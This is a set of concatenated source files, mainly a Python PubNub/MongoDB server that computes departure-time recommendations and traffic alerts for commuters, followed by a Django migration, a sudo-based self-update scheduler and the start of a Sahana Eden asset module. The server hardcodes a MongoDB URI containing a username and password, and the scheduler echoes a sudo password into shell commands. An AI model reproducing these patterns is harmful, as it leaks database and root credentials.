if (client_data[channel]['recommndsentproceed'] == True):
pbtry = 0
while (pbtry<3):
try:
pbreturn = pubnub.publish(channel = channel ,message =result,error=error)
if (pbreturn[0] == 1):
return None
elif(pbreturn[0] == 0):
logging.error("The publish return error %s for the client %s\n"%(pbreturn[1],channel))
pbtry+=1
else:
pass
except Exception as error_pdhandler:
logging.error("The error_pdhandler Exception is %s,%s\n"%(error_pdhandler,type(error_pdhandler)))
pbtry+=1
else:
pass
except Exception as pubhandlerError:
logging.error("The publish function Exception is %s,%s,%s\n"%(pubhandlerError,type(pubhandlerError),str(result)))
'''****************************************************************************************
Function Name : alertpublish_handler (pubnub operation)
Description : Function used to publish the data to the client
Parameters : channel - UUID of the client
result - The result i.e., The dictionary contains recommendations or alerts
****************************************************************************************'''
def alertpublish_handler(channel,result):
try:
if (client_data[channel]['alertsentproceed'] == True):
pbtry = 0
while (pbtry<3):
try:
pbreturn = pubnub.publish(channel = channel ,message =result,error=error)
if (pbreturn[0] == 1):
client_data[channel].update({"alertsentproceed":False})
return None
elif(pbreturn[0] == 0):
logging.error("The publish return error %s for the client %s\n"%(pbreturn[1],channel))
pbtry+=1
else:
pass
except Exception as error_pdhandler:
logging.error("The alerterror_pdhandler Exception is %s,%s\n"%(error_pdhandler,type(error_pdhandler)))
pbtry+=1
else:
pass
except Exception as alertpubhandlerError:
logging.error("The alertpublish function Exception is %s,%s,%s\n"%(alertpubhandlerError,type(alertpubhandlerError),str(result)))
'''****************************************************************************************
Function Name : recommendationAlgoFunc (Algorithm operation)
Description : Function used to do the Algorithm
Parameters : DesiredArrivalTime - client's Desired ArrivalTime to the Destination
clientID - client's UUID
****************************************************************************************'''
def recommendationAlgoFunc(DesiredArrivalTime,clientID):
try:
global newttobackground
proceed = False
dateproceed = False
route_time = datetime.datetime.now(pytz.timezone(client_data[clientID]['timeZone']))
theorytimeinsecs = client_data[clientID]['theoryTime']
# TheoriticalTravelDuration(TTD)
TheoriticalTravelDuration = theorytimeinsecs/60.0 #Theory time in minutes
# ILLUSTRATION STEP 1 --> Round Off TTD to nearest 10min time interval by introducing offset
if (TheoriticalTravelDuration%10 >= 5):
# OFFSET VALUE
rem = 10.0-TheoriticalTravelDuration%10
else:
rem = TheoriticalTravelDuration%10
# OFFSET VALUE
rem = -rem
TimeDurationOffset = rem #(TDO)
Limit = 1
# All the mongolab operations are inside the try exception block
try:
# This is to get the latest date in the mongodb
dateCursor = newttobackground.ttobgcoll.find({"route":client_data[clientID]['routeName']}).sort('recorddate', pymongo.DESCENDING).limit(Limit)
for datedoc in dateCursor:
endDate = datedoc['recorddate']
dateproceed = True
except Exception as e:
dateproceed = False
result = {"responseType":4,"message":"oops!! Internal problem"}
publish_handler(clientID,result)
logging.error("The dateCursor error is %s,%s\n"%(e,type(e)))
if dateproceed == True:
diff = DesiredArrivalTime-route_time
day = diff.days
hour = (day*24 + diff.seconds/3600)
realtimeinminutes = []
time = []
# ILLUSTRATION STEP 2 --> Fetch 12hr advance prediction for the Selected Route
try:
#This is to get the predictions from the result collection
cursor = newttobackground.ttoresultcoll.find({"route":client_data[clientID]['routeName']}).sort('time', pymongo.ASCENDING).limit(150)
if (0<=hour <= 12 and 0<=day<=1):
proceed = True
for datadoc in cursor:
time.append(datadoc['time'].replace(second=0))
realtimeinminutes.append(datadoc['predictioninmins'])
else:
if day < 0:
result = {"responseType":4,"message":"Desired Arrival Time is below 12 hours range"}
else:
result = {"responseType":4,"message":"Desired Arrival Time is more than 12 hours away"}
publish_handler(clientID,result)
proceed = False
del client_data[clientID]
except Exception as e:
logging.error("The testdatacursor error is %s,%s\n"%(e,type(e)))
proceed = False
result = {"responseType":4,"message":"oops!! Internal problem"}
publish_handler(clientID,result)
timediffinminutes = []
# ILLUSTRATION STEP 3 --> Update all predicted time durations with the TDO value
if (proceed == True):
for j in realtimeinminutes:
timediffinminutes.append((((float(j)-(TheoriticalTravelDuration)))+TimeDurationOffset))
DesiredArrivalTimeIndexInList = -1
for i in range(len(time)):
if (int(DesiredArrivalTime.strftime("%H")) == int(time[i].strftime("%H")) and int(DesiredArrivalTime.strftime("%M")) == int(time[i].strftime("%M"))):
DesiredArrivalTimeIndexInList = time.index(time[i])
try:
if DesiredArrivalTimeIndexInList != -1:
pred_minutes = []
for i in range(len(timediffinminutes)):
pred_minutes.append(float(timediffinminutes[i]+TheoriticalTravelDuration))
# ILLUSTRATION STEP 4 --> Handled as part of the overall flow of STEP 6
# ILLUSTRATION STEP 5 --> Calculate Recommendation Reference Start Time(RRST) from the DAT and TTD
RecommendationRefferenceStartTime = int(DesiredArrivalTimeIndexInList-((TheoriticalTravelDuration+TimeDurationOffset)/10))
i = RecommendationRefferenceStartTime
recommendationFlag = True
checkedOnce = []
recommendationResult = {}
listlen = len(time)
j = 0
while (recommendationFlag == True):
predictedArrivalTime = time[i]+datetime.timedelta(minutes=pred_minutes[i])
replaceapproach = predictedArrivalTime.replace(tzinfo=pytz.timezone(client_data[clientID]['timeZone']))
zone = pytz.timezone(client_data[clientID]["timeZone"])
predictedArrivalTime = zone.localize(predictedArrivalTime)
diff = DesiredArrivalTime - predictedArrivalTime
diff_minutes = (diff.days *24*60)+(diff.seconds/60)
# ILLUSTRATION STEP 6.3 --> Checking for the onTime
if (diff_minutes == 0): #This condition is the top priority
pred_minutesReal = pred_minutes[i]-TimeDurationOffset
# ILLUSTRATION STEP 6.3.1 --> Return the latest ontime recommendations to the user
recommendationResult.update({"onTime":{"predictedDepartureTime":str(time[i].replace(second=0,tzinfo=None)),"predictedArrivalTime":str(predictedArrivalTime.replace(tzinfo=None)),"dep_note":"You will reach ontime","pred_minutesReal":pred_minutesReal}})
recommendationFlag = False
# ILLUSTRATION STEP 6.6(Condition)--> Checking for the early
elif (0<=diff_minutes<=10):
pred_minutesReal = pred_minutes[i]-TimeDurationOffset
if(time[i] not in checkedOnce):
checkedOnce.append(time[i])
# ILLUSTRATION STEP 6.1,6.2 --> Derive the latest Recommendation
recommendationResult.update({"Early":{"predictedDepartureTime":str(time[i].replace(second=0,tzinfo=None)),"predictedArrivalTime":str(predictedArrivalTime.replace(tzinfo=None)),"dep_note":"You will reach %s min(s) early"%(abs(diff_minutes)),"pred_minutesReal":pred_minutesReal}})
# ILLUSTRATION STEP 6.6(Operation) --> Move RRST 10min Forward
i+=1
else:
# ILLUSTRATION 6.4.1(Scenario 1) --> Return the latest late and early recommendations to the user
recommendationResult.update({"Early":{"predictedDepartureTime":str(time[i].replace(second=0,tzinfo=None)),"predictedArrivalTime":str(predictedArrivalTime.replace(tzinfo=None)),"dep_note":"You will reach %s min(s) early"%(abs(diff_minutes)),"pred_minutesReal":pred_minutesReal}})
recommendationFlag = False
# ILLUSTRATION STEP 6.7(Condition) --> Checking for the late
else:
if diff_minutes <0:
pred_minutesReal = pred_minutes[i]-TimeDurationOffset
if (time[i] not in checkedOnce):
checkedOnce.append(time[i])
# ILLUSTRATION STEP 6.1,6.2 --> Derive the latest Recommendation
recommendationResult.update({"Late":{"predictedDepartureTime":str(time[i].replace(second=0,tzinfo=None)),"predictedArrivalTime":str(predictedArrivalTime.replace(tzinfo=None)),"dep_note":"You will reach %s min(s) late"%(abs(diff_minutes)),"pred_minutesReal":pred_minutesReal}})
# ILLUSTRATION STEP 6.7(Operation) --> Move RRST 10min Backward
i-=1
else:
# ILLUSTRATION 6.4.1(Scenario 2) --> Return the latest early and late recommendations to the user
recommendationResult.update({"Late":{"predictedDepartureTime":str(time[i].replace(second=0,tzinfo=None)),"predictedArrivalTime":str(predictedArrivalTime.replace(tzinfo=None)),"dep_note":"You will reach %s min(s) late"%(abs(diff_minutes)),"pred_minutesReal":pred_minutesReal}})
recommendationFlag = False
else:
i+=1
recommresult = []
for val in recommendationResult.keys():
recommresult.append(recommendationResult[val])
pub_dict = {"responseType":1,"route_name":client_data[clientID]['routeName'],"arrival_time":str(DesiredArrivalTime.replace(tzinfo=None)),"recommendation":recommresult}
publish_handler(client_data[clientID]["clientID"],pub_dict)
logging.info("The sent message for the recommendationmessage%s\n"%(str(pub_dict)))
client_data[clientID].update({"recommndsentproceed":False})
except Exception as e:
logging.error("The error occured in recommalgoinnerError is %s,%s\n"%(e,type(e)))
result = {"responseType":4,"message":"oops!! Internal problem"}
publish_handler(clientID,result)
except Exception as recommalgoError:
result = {"responseType":4,"message":"oops!! Internal problem"}
publish_handler(clientID,result)
logging.error("The error occured in recommalgoError is %s,%s\n"%(recommalgoError,type(recommalgoError)))
'''****************************************************************************************
Function Name : Alerts (Algorithm operation)
Description : Function used to get and send the Alerts to the client
Parameters : clientID - client's UUID
alert - Flag(True-->When journey started , False -->before journey) internal operation purpose
****************************************************************************************'''
def Alerts(clientID,alert):
try:
Limit = 1
alertList = []
routeName = client_data[clientID]["routeName"]
alertcursorproceed = False
length = -1
try:
#Alerts are in the ttobgcoll collection so getting the latest alerts for the route
for alertdatedoc in newttobackground.ttobgcoll.find({"route":routeName}).sort('recorddate', pymongo.DESCENDING).limit(Limit):
endDate = alertdatedoc['recorddate']
for alertdoc in newttobackground.ttobgcoll.find({"route":routeName,"recorddate":endDate}):
length = len(alertdoc['traffic']['incidents'])
alertcursorproceed = True
except Exception as e:
logging.error("The latestalertcursor error is %s,%s\n"%(e,type(e)))
alertseverity = []
if (alertcursorproceed == True and length != -1):
for i in range(length):
if alertdoc['traffic']['incidents'][i]['type'] == 4:
alertList.append({"eventType":alertdoc['traffic']['incidents'][i]['type'],"shortDesc":alertdoc['traffic']['incidents'][i]['shortDesc']})
alertseverity.append(alertdoc['traffic']['incidents'][i]['severity'])
if (len(alertseverity)>1):
secltdalert = max(alertseverity)
maxseverealertIndex = alertseverity.index(secltdalert)
alertList = [alertList[maxseverealertIndex]]
alertpub_dict = {"responseType":2,"message":alertList}
logging.info("AlertsMessage-->%s,%s\n"%(str(alertpub_dict),str(clientID)))
# if there are any alerts then send or dont
if (len(alertList)>0):
if alert == True:
alertpublish_handler(clientID,alertpub_dict)
else:
publish_handler(clientID,alertpub_dict)
else:
pass
except Exception as alertError:
logging.error("The error occured in alertError is %s,%s\n"%(alertError,type(alertError)))
logging.info(str(alertdoc)+"\n")
'''****************************************************************************************
Function Name : beforeJourneyTenminUpdate (Algorithm operation)
Description : Function used invoke the beforeJourney function every ten minute
****************************************************************************************'''
def beforeJourneyTenminUpdate():
while True:
try:
global g_minit,g_sleepTime,g_divCompare
i = 0
while True:
if(int(datetime.datetime.now().strftime("%M"))%g_minit == g_divCompare):
if (len(beforeJourneyClientList.keys())>0):
localDictbeforeJourneyupdate = client_data
for cid in beforeJourneyClientList.keys():
numofclients = len(beforeJourneyClientList.keys())
if cid in beforeJourneyClientList.keys():
if i<numofclients:
try:
if cid in client_data.keys():
client_data[cid].update({"everyTenminproceed":True})
i+=1
except Exception as e:
logging.error("The beforeJourneyTenminUpdateinternalError Exception is %s,%s\n"%(e,type(e)))
else:
i = 0
time.sleep(g_sleepTime)
except Exception as beforeJourneyTenminUpdateError:
logging.error("The error occured in beforeJourneyTenminUpdateError is %s,%s\n"%(beforeJourneyTenminUpdateError,type(beforeJourneyTenminUpdateError)))
'''****************************************************************************************
Function Name : startedJourneyTenminUpdate (Algorithm operation)
Description : Function used invoke the startedJourney function every ten minute
****************************************************************************************'''
def startedJourneyTenminUpdate():
while True:
try:
global g_minit,g_sleepTime,g_divCompare
i = 0
while True:
if (int(datetime.datetime.now().strftime("%M"))%g_minit == g_divCompare):
if (len(startedJourneyClientList.keys())>0):
localDictStartedJourneyupdate = client_data
for cid in startedJourneyClientList.keys():
if cid in commonStartedClientIDList:
numofclients = len(startedJourneyClientList.keys())
if i<numofclients:
try:
if cid in startedJourneyClientList.keys():
startedJourneyClientList[cid].update({"alertsentproceed":True})
if cid in client_data.keys():
client_data[cid].update({"everyTenminproceed":True})
i+=1
except Exception as e:
logging.error("The startedJourneyTenminUpdateinternalError Exception is %s,%s\n"%(e,type(e)))
else:
i = 0
time.sleep(g_sleepTime)
except Exception as startedJourneyTenminUpdateError:
logging.error("The error occured in startedJourneyTenminUpdateError is %s,%s\n"%(startedJourneyTenminUpdateError,type(startedJourneyTenminUpdateError)))
'''****************************************************************************************
Function Name : stopJourney (Algorithm operation)
Description : Function used to delete the invalid clients from the internal Algorithm operations
****************************************************************************************'''
def stopJourney(stpCid):
# Deleting clients from only commonclient lists and client_data
try:
delCid = stpCid
if delCid in client_data.keys():
del client_data[delCid]
if delCid in commonClientIDList:
index = commonClientIDList.index(delCid)
del commonClientIDList[index]
if delCid in commonStartedClientIDList:
index = commonStartedClientIDList.index(delCid)
del commonStartedClientIDList[index]
except Exception as stopJourneyError:
logging.error("The error occured in stopJourneyError is %s,%s\n"%(stopJourneyError,type(stopJourneyError)))
'''****************************************************************************************
Function Name : recommendationAlertFunc (Algorithm operation)
Description : Function used to get and send the Alerts to the client
Parameters : recommtime - client's Recommended Departure Time
cid - client's UUID
pred_minutesReal - The travel duration time for the Recommended Departure Time
****************************************************************************************'''
def recommendationAlertFunc(recommtime,cid,pred_minutesReal):
try:
recommendationAlertPredictions = []
recommendationAlertTime = []
recommendationAlertIndex = -1
recommtime = recommtime.replace(second=0)
try:
cursor = newttobackground.ttoresultcoll.find({"route":client_data[cid]['routeName']})
for doc in cursor:
recommendationAlertPredictions.append(doc['predictioninmins'])
recommendationAlertTime.append(doc['time'].replace(second=0))
if recommtime in recommendationAlertTime:
recommendationAlertIndex = recommendationAlertTime.index(recommtime)
except Exception as e:
logging.error("The error occured in internal recommendationAlertFunc is %s,%s\n"%(e,type(e)))
if (recommendationAlertIndex != -1):
val = int(recommendationAlertPredictions[recommendationAlertIndex]) * 60
pred_minutesReal = int(pred_minutesReal) * 60
if pred_minutesReal == val:
logging.info("recommendationAlertMessage--> no change%s,%s\n"%(str(val),str(pred_minutesReal)))
return 1,0
else:
diff = pred_minutesReal - val
logging.info("recommendationAlertMessage-->change in predictions %s,%s,%s\n"%(str(val),str(pred_minutesReal),str(float(diff)/60.0)))
return 0,float(diff)/60.0
else:
logging.info("The recommtime-->%s"%(str(recommtime)))
pass
except Exception as recommendationAlertFuncError:
logging.error("The error occured in recommendationAlertFuncError is %s,%s\n"%(recommendationAlertFuncError,type(recommendationAlertFuncError)))
'''****************************************************************************************
Function Name : beforeJourney (Algorithm operation)
Description : Function responsible for updates regarding the change in Recommendation change
and Alerts before journey starts
****************************************************************************************'''
def beforeJourney():
try:
global g_minit,g_divCompare
while True:
if (len(beforeJourneyClientList.keys())>0):
for cid in beforeJourneyClientList.keys():
if cid in commonClientIDList:
localDict = client_data[cid]
presentrouteTime = datetime.datetime.now(pytz.timezone(localDict['timeZone']))
recommendedTime = beforeJourneyClientList[cid]["recommendedDepTime"]
diff = recommendedTime-presentrouteTime
diffMin = (diff.days * 24 * 60) + (diff.seconds/60)
# executes every10min thats why one more condition checking for 10mins
if (0<=diffMin<= 720):
val = datetime.datetime.now(pytz.timezone(localDict['timeZone'])).strftime("%M")
if (int(val)%g_minit == g_divCompare and localDict['everyTenminproceed'] == True):#make sure you are dividing with 10 for the 10min purpose
arrivalTime = datetime.datetime.strptime(localDict["arrivalTime"], "%Y-%m-%d %H:%M:%S")
zone = pytz.timezone(localDict["timeZone"])
arrivalTime = zone.localize(arrivalTime)
existedRecommendation = beforeJourneyClientList[cid]["recommendedDepTime"]
existedpredminutesReal = beforeJourneyClientList[cid]["pred_minutesReal"]
existedRecommendation = existedRecommendation.replace(tzinfo=None)
result,val = recommendationAlertFunc(existedRecommendation,cid,existedpredminutesReal)
logging.info("beforejourneyMessage-->clients now%s\n"%(str(cid)))
if result == 0:#Different prediction
localDict.update({"recommndsentproceed":True})
# means new recommendation
localDict.update({"everyTenminproceed":False})
# means comeback after 10mins
if val > 0:
message = {"responseType":3,"message":"You should start %smin(s) after %s"%(int(val),str(recommendedTime.replace(second=0,tzinfo=None)))}
if val < 0:
message = {"responseType":3,"message":"You should start %smin(s) earlier than %s "%(abs(int(val)),str(recommendedTime.replace(second=0,tzinfo=None)))}
logging.info("recommendationAlert -->%s"%(str(message)))
publish_handler(cid,message)
else:
# # means new recommendation
localDict.update({"everyTenminproceed":False})
#Alerts
localDict.update({"recommndsentproceed":True})
Alerts(cid,False)
localDict.update({"recommndsentproceed":False})
# updating to main dictionary
if cid in client_data.keys():
client_data[cid].update({"recommndsentproceed":localDict["recommndsentproceed"],"everyTenminproceed":localDict["everyTenminproceed"]})
else:
# it means client started the journey moved to startjourneylist
del beforeJourneyClientList[cid]
except Exception as beforejourneyError:
logging.error("The error occured in beforejourneyError is %s,%s\n"%(beforejourneyError,type(beforejourneyError)))
'''****************************************************************************************
Function Name : startedJourney (Algorithm operation)
Description : Function responsible to send Alerts if any after journey starts
****************************************************************************************'''
def startedJourney():
while True:
try:
global g_minit,g_sleepTime,g_divCompare
while True:
if (len(startedJourneyClientList.keys()) == len(commonStartedClientIDList)):
localDictStartedJourney = client_data
for strtCid in startedJourneyClientList.keys():
if strtCid in commonStartedClientIDList:
presentrouteTimeminute = int(datetime.datetime.now(pytz.timezone(localDictStartedJourney[strtCid]['timeZone'])).strftime("%M"))
if (presentrouteTimeminute%g_minit == g_divCompare and localDictStartedJourney[strtCid]['everyTenminproceed'] == True):
logging.info("startedJourneyMessage--> Clients now%s\n"%(str(strtCid)))
Alerts(strtCid,True)
if strtCid in client_data.keys():
client_data[strtCid].update({"everyTenminproceed":False})
else:
for strtCid in startedJourneyClientList.keys():
if strtCid not in commonStartedClientIDList:
del startedJourneyClientList[strtCid]
except Exception as startedJourneyError:
logging.error("The error occured in startedJourneyError is %s,%s\n"%(startedJourneyError,type(startedJourneyError)))
'''****************************************************************************************
Function Name : delCheck (Algorithm operation)
Description : Function responsible to delete the expired clients
****************************************************************************************'''
def delCheck():
while True:
try:
global g_sleepTime,g_minit
i=0
while True:
if (int(datetime.datetime.now().strftime("%M"))%g_minit == 0):
if len(client_data.keys())>0:
localDictDelcheck = client_data
for clientID in localDictDelcheck.keys():
numofclients = len(localDictDelcheck.keys())
if i<numofclients:
if clientID in localDictDelcheck.keys():
DAT = datetime.datetime.strptime(str(localDictDelcheck[clientID]["arrivalTime"]), "%Y-%m-%d %H:%M:%S")
zone = pytz.timezone(localDictDelcheck[clientID]["timeZone"])
DAT = zone.localize(DAT)
# Deleting the clients that crossed the Arrival time range.
travelTime = int(localDictDelcheck[clientID]['theoryTime'])+3600
journeyEndTime = DAT + datetime.timedelta(seconds=travelTime)# journey time with extra 20min buffer
presentrouteTime = datetime.datetime.now(pytz.timezone(localDictDelcheck[clientID]['timeZone']))
diff = journeyEndTime - presentrouteTime
diff_minutes = (diff.days *24*60)+(diff.seconds/60)
if diff_minutes<=0:
# clearing the startedJourneyList dictionary.
if clientID in startedJourneyClientList.keys():
logging.info("delCheckMessage--> Something to Delete in startedJourneyClientList %s,%s\n"%(str(clientID),str(DAT)))
del startedJourneyClientList[clientID]
if clientID in client_data.keys():
logging.info("delCheckMessage--> Something to Delete in client_data %s,%s\n"%(str(clientID),str(DAT)))
del client_data[clientID]
#clearing the commonStartedClientIDList.
if clientID in commonStartedClientIDList:
logging.info("delCheckMessage--> Something to Delete in commonStartedClientIDList %s,%s\n"%(str(clientID),str(DAT)))
index = commonStartedClientIDList.index(clientID)
del commonStartedClientIDList[index]
else:
# timerange over checking else part
logging.info("delCheckMessage--> Nothing to Delete%s,%s\n"%(str(clientID),str(DAT)))
else:
# client_data keys checking else part
pass
i+=1
else:
i=0
time.sleep(g_sleepTime)
except Exception as delCheckError:
logging.error("The error occured in delCheckError is %s,%s\n"%(delCheckError,type(delCheckError)))
'''****************************************************************************************
Function Name : tto_callback (Callback operation)
Description : Callback function listens to the channel for the messages
Parameters : message - message from the client
channel - UUID of the client
****************************************************************************************'''
def tto_callback(message,channel):
try:
if message.has_key("requestType") and message.has_key("CID"):
logging.info(str(message)+"\n")#printing the message we receive from the client
clientID = str(message['CID'])
requestType = int(message['requestType'])
if clientID in client_data.keys():
if requestType == 1: # request for the recommendation
# here client should be there in the commonClientIDList because we are adding it at time of entrance
if clientID not in commonClientIDList:
commonClientIDList.append(clientID)
routeName = str(message['routeName'])#only in requesttype 1 we will get it
# adding necessary client data
if not client_data.has_key(clientID):
client_data.setdefault(clientID,{"clientID":clientID,"timeZone":zone_ttimedct[routeName][0],"theoryTime":zone_ttimedct[routeName][1],"arrivalTime":str(message['arrivalTime']),"routeName":routeName,"everyTenminproceed":False,"recommndsentproceed":True,"alertsentproceed":False})
# datetime format
arrivalTime = datetime.datetime.strptime(str(message['arrivalTime']), "%Y-%m-%d %H:%M:%S")
# adding timezone using localizing technique
zone = pytz.timezone(client_data[clientID]["timeZone"])
arrivalTime = zone.localize(arrivalTime)
recommendationAlgoFunc(arrivalTime,clientID)#calling the recommendation algorithm function
if requestType == 2: #request for starting the journey
startTime = datetime.datetime.strptime(str(message["startTime"]),"%Y-%m-%d %H:%M:%S")
zone = pytz.timezone(client_data[clientID]["timeZone"])
arrivalTime = zone.localize(startTime)
# sharing client id with started journey list so that there wont any problem for the dependency functions
if clientID not in commonStartedClientIDList:
commonStartedClientIDList.append(clientID)
if not startedJourneyClientList.has_key(clientID):
startedJourneyClientList.setdefault(clientID,{"clientID":clientID,"recommendedTime":arrivalTime})
# incase if the client started journey immeddiately before entering into the beforejourney list
if clientID in commonClientIDList:
index = commonClientIDList.index(clientID)
del commonClientIDList[index]
# updating alertsentproceed so the alerts will work for the client
client_data[clientID].update({"alertsentproceed":True})
# callling the alertsent function
Alerts(clientID,True)
logging.info("The clients in startedJourney stage %s\n"%(str(startedJourneyClientList)))
if requestType == 3: #when clients ends the journey
stpCid = str(message['CID'])
stopJourney(stpCid)
if requestType == 4:# confirmation from the client to remember the query
recommendedDepTime = datetime.datetime.strptime(message['recommendedDepTime'], "%Y-%m-%d %H:%M:%S")
zone = pytz.timezone(client_data[clientID]["timeZone"])
recommendedDepTime = zone.localize(recommendedDepTime)
if not beforeJourneyClientList.has_key(clientID):
beforeJourneyClientList.setdefault(clientID,{"clientID":clientID,"recommendedDepTime":recommendedDepTime,"pred_minutesReal":message['pred_minutesReal']})
logging.info("The clients in the beforeJourney stage%s\n"%(str(beforeJourneyClientList)))
else:
if requestType == 1:
if clientID not in commonClientIDList:
commonClientIDList.append(clientID)
routeName = str(message['routeName'])#only in requesttype 1 we will get it
# adding necessary client data
if not client_data.has_key(clientID):
client_data.setdefault(clientID,{"clientID":clientID,"timeZone":zone_ttimedct[routeName][0],"theoryTime":zone_ttimedct[routeName][1],"arrivalTime":str(message['arrivalTime']),"routeName":routeName,"everyTenminproceed":False,"recommndsentproceed":True,"alertsentproceed":False})
# datetime format
arrivalTime = datetime.datetime.strptime(message['arrivalTime'], "%Y-%m-%d %H:%M:%S")
# adding timezone using localizing technique
zone = pytz.timezone(client_data[clientID]["timeZone"])
arrivalTime = zone.localize(arrivalTime)
recommendationAlgoFunc(arrivalTime,clientID)#calling the recommendation algorithm function
else:
pass
except Exception as callbackError:
logging.error("The error occured in callbackError is %s,%s\n"%(callbackError,type(callbackError)))
'''****************************************************************************************
Function Name : error
Description : If error in the channel, prints the error
Parameters : message - error message
****************************************************************************************'''
def error(message):
logging.error("ERROR on Pubnub: " + str(message)+"\n")
'''****************************************************************************************
Function Name : connect
Description : Responds if server connects with pubnub
Parameters : message - connect message
****************************************************************************************'''
def connect(message):
logging.info("CONNECTED\n")
'''****************************************************************************************
Function Name : reconnect
Description : Responds if server reconnects with pubnub
Parameters : message - reconnect message
****************************************************************************************'''
def reconnect(message):
logging.info("RECONNECTED\n")
'''****************************************************************************************
Function Name : disconnect
Description : Responds if server disconnects from pubnub
Parameters : message - disconnect message
****************************************************************************************'''
def disconnect(message):
logging.info("DISCONNECTED\n")
'''****************************************************************************************
Function Name : channel_subscriptions (pubnub operation)
Description : Function intializes the pubnub subscribing to a specific channel
****************************************************************************************'''
def channel_subscriptions():
global pubnub
try:
pubnub.subscribe(channels='ttotest1', callback=tto_callback,error=error,
connect=connect, reconnect=reconnect, disconnect=disconnect)
except Exception as channelsubserror:
logging.error("The error occured in channel_subscriptions is %s,%s\n"%(channelsubserror,type(channelsubserror)))
'''****************************************************************************************
Function Name : mongoInit (Mongodb operation)
Description : Function initalizes the mongodb connection
****************************************************************************************'''
def mongoInit():
global newttobackground
try:
uri ='mongodb://rajeevtto:radiostud@ds035315-a0.mongolab.com:35315,ds035315-a1.mongolab.com:35315/newttobackground?replicaSet=rs-ds035315'
client = MongoClient(uri)
newttobackground = client.newttobackground
logging.info('connected\n')
except Exception as e:
logging.error("The error occured in mongoInit is %s,%s\n"%(e,type(e)))
'''****************************************************************************************
Function Name : pub_Init (pubnub operation)
Description : Function intializes the pubnub connection
****************************************************************************************'''
def pub_Init():
global pubnub
try:
pubnub = Pubnub(publish_key=pub_key,subscribe_key=sub_key)
return True
except Exception as pubException:
logging.error("The pubException is %s,%s\n"%(pubException,type(pubException)))
return False
'''****************************************************************************************
Function Name : Init (Functional operation)
Description : Function initializes the pubinit and mongoinit
****************************************************************************************'''
def Init():
dBreturn = mongoInit()
pbreturn = pub_Init()
if (dBreturn == False or pbreturn == False):
logging.info("Program Terminated\n")
sys.exit()
else:
channel_subscriptions()
if __name__ == '__main__':
try:
f1 = threading.Thread(target = Init)
f2 = threading.Thread(target = beforeJourney)
f3 = threading.Thread(target = startedJourney)
f4 = threading.Thread(target = beforeJourneyTenminUpdate)
f5 = threading.Thread(target = startedJourneyTenminUpdate)
f6 = threading.Thread(target = delCheck)
f1.start()
f2.start()
f4.start()
f3.start()
f5.start()
f6.start()
except Exception as e:
logging.error("The main Exception is %s,%s\n"%(e,type(e)))
|
shyampurk/tto-bluemix
|
ttoServer/ttoServer.py
|
Python
|
mit
| 37,445
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-07-12 15:31
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
import picklefield.fields
import src.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='CallLater',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(default='', max_length=64, verbose_name='additional lookup field')),
('time_to_run', models.DateTimeField(default=django.utils.timezone.now)),
('time_to_stop', models.DateTimeField(blank=True, null=True)),
('function', picklefield.fields.PickledObjectField(editable=False)),
('args', picklefield.fields.PickledObjectField(editable=False, null=True)),
('kwargs', picklefield.fields.PickledObjectField(editable=False, null=True)),
('repeat', models.PositiveIntegerField(default=1)),
('every', models.DurationField(blank=True, null=True)),
('when_check_if_failed', models.DateTimeField(default=src.models.far_future_fail_timeout)),
('retries', models.PositiveIntegerField(default=3)),
('timeout_retries', models.PositiveIntegerField(default=2)),
('problem', models.BooleanField(default=False)),
],
),
]
|
andytwoods/zappa-call-later
|
zappa-call-later/migrations/0001_initial.py
|
Python
|
mit
| 1,577
|
import os
from decouple import config
sudoPassword = config('SUDOPASSWORD')
def update():
"""
Automatisches Update des Reservierungssystems über Github
"""
try:
command_stop = 'sudo supervisorctl stop abwreservierung && sudo supervisorctl start abwreservierung && sudo chmod +x startup'
os.system('echo %s|sudo -S %s' % (sudoPassword, command_stop))
except:
pass
try:
os.system('cd /home/webserver/abwreservierung && git pull')
except:
pass
try:
command_start = 'sudo supervisorctl start abwreservierung'
os.system('echo %s|sudo -S %s' % (sudoPassword, command_start))
except:
pass
try:
command_chmod = 'sudo chmod +x startup'
os.system('echo %s|sudo -S %s' % (sudoPassword, command_chmod))
except:
pass
def alte_reservierungen():
"""
Automatisches entfernen der alten Reservierungen
"""
os.system("/bin/bash -c 'source ../django-server/bin/activate && python src/manage.py alte_reservierungen && deactivate'")
scheduler = BlockingScheduler()
scheduler.add_job(update, 'cron', day_of_week='sun', hour=12)
scheduler.add_job(alte_reservierungen, 'cron', day_of_week="mon-fri", hour=17)
scheduler.start()
|
holytortoise/abwreservierung
|
auto_process.py
|
Python
|
mit
| 1,255
|
# -*- coding: utf-8 -*-
""" Sahana Eden Assets Model
@copyright: 2009-2012 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ["S3AssetModel",
"asset_rheader",
"asset_types",
"asset_log_status",
]
from gluon import *
from gluon.sqlhtml import RadioWidget
from gluon.storage import Storage
from ..s3 import *
ASSET_TYPE_VEHICLE = 1 # => Extra Tab(s) for Registration Documents, Fuel Efficiency
ASSET_TYPE_RADIO = 2 # => Extra Tab(s) for Radio Channels/Frequencies
ASSET_TYPE_TELEPHONE = 3 # => Extra Tab(s) for Contact Details & Airtime Billing
ASSET_TYPE_OTHER = 4 # => No extra Tabs
# To pass to global scope
asset_types = {
"VEHICLE" : ASSET_TYPE_VEHICLE,
"RADIO" : ASSET_TYPE_RADIO,
